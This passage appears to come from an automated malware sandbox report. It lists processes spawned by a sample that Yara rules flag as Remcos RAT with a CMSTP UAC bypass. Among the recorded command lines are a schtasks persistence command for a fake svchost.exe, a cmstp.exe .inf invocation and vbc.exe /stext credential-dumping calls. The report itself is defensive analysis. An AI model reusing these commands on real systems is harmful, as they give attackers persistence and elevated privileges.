                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                                                                                                                                                                                    Imagebase:0x7ff69be40000
                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                    Start time:13:13:26
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:timeout 3
                                                                                                                                                                                    Imagebase:0x7ff7f0cd0000
                                                                                                                                                                                    File size:32'768 bytes
                                                                                                                                                                                    MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                    Start time:13:13:28
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                    Imagebase:0x22705790000
                                                                                                                                                                                    File size:948'209 bytes
                                                                                                                                                                                    MD5 hash:C828227DB6D7BC08DD8E9B7313A0E770
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.1926724115.00000227078A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 58%, ReversingLabs
                                                                                                                                                                                    • Detection: 49%, Virustotal, Browse
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                    Start time:13:13:28
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                    Start time:13:13:29
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                    Imagebase:0x1e1dbcb0000
                                                                                                                                                                                    File size:948'209 bytes
                                                                                                                                                                                    MD5 hash:C828227DB6D7BC08DD8E9B7313A0E770
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1861743412.000001E1DDBDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                    Start time:13:13:29
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                    Start time:13:13:33
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe
                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                    File size:40'880 bytes
                                                                                                                                                                                    MD5 hash:EF2DCDFF05E9679F8D0E2895D9A2E3BB
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                    Start time:13:13:34
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                    File size:828'368 bytes
                                                                                                                                                                                    MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                    Start time:13:13:34
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                    Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                    Start time:13:13:38
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                    Imagebase:0x172200f0000
                                                                                                                                                                                    File size:948'209 bytes
                                                                                                                                                                                    MD5 hash:C828227DB6D7BC08DD8E9B7313A0E770
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1814204610.00000172222A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1814204610.0000017222011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                    Start time:13:13:38
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                    Start time:13:13:39
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Windows Mail\wab.exe"
                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                    File size:516'608 bytes
                                                                                                                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                    Start time:13:13:39
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                                                    Imagebase:0xf40000
                                                                                                                                                                                    File size:2'625'616 bytes
                                                                                                                                                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.4014378361.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                    Start time:13:13:39
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                    File size:2'625'616 bytes
                                                                                                                                                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                    Start time:13:13:39
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                    Imagebase:0x7ff67e6d0000
                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                    Start time:13:13:39
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                    File size:2'625'616 bytes
                                                                                                                                                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                    Start time:13:13:39
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864
                                                                                                                                                                                    Imagebase:0x7ff751e40000
                                                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                    Start time:13:13:39
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 5864 -s 1120
                                                                                                                                                                                    Imagebase:0x7ff751e40000
                                                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                    Start time:13:13:40
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                                                                    Imagebase:0xea0000
                                                                                                                                                                                    File size:2'141'552 bytes
                                                                                                                                                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                    Start time:13:13:41
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                    File size:2'141'552 bytes
                                                                                                                                                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                    Start time:13:13:41
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 460 -p 2772 -ip 2772
                                                                                                                                                                                    Imagebase:0x7ff751e40000
                                                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                    Start time:13:13:41
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 2772 -s 1072
                                                                                                                                                                                    Imagebase:0x7ff751e40000
                                                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                    Start time:13:13:43
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                    Imagebase:0x7ff67e6d0000
                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                    Start time:13:13:44
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\lmxgukvurszvufgxilvllznhpy"
                                                                                                                                                                                    Imagebase:0xf40000
                                                                                                                                                                                    File size:2'625'616 bytes
                                                                                                                                                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                    Start time:13:13:44
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\cmstp.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.inf
                                                                                                                                                                                    Imagebase:0x7ff6ca070000
                                                                                                                                                                                    File size:98'304 bytes
                                                                                                                                                                                    MD5 hash:4CC43FE4D397FF79FA69F397E016DF52
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770928480.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770848664.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770876326.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770951803.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770441759.000002453D690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770666779.000002453D690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770897911.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770638691.000002453D690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                    Start time:13:13:44
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"
                                                                                                                                                                                    Imagebase:0xf40000
                                                                                                                                                                                    File size:2'625'616 bytes
                                                                                                                                                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                    Start time:13:13:44
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                    Imagebase:0x7ff67e6d0000
                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                    Start time:13:13:44
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"
                                                                                                                                                                                    Imagebase:0xf40000
                                                                                                                                                                                    File size:2'625'616 bytes
                                                                                                                                                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                    Start time:13:13:48
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\yiqjvvqpbijnhrqfbgcgyquhzthfbppay"
                                                                                                                                                                                    Imagebase:0xf40000
                                                                                                                                                                                    File size:2'625'616 bytes
                                                                                                                                                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                    Start time:13:13:47
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                    Imagebase:0x1d0e83a0000
                                                                                                                                                                                    File size:948'209 bytes
                                                                                                                                                                                    MD5 hash:C828227DB6D7BC08DD8E9B7313A0E770
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.1955305299.000001D080302000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                    Start time:13:13:47
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
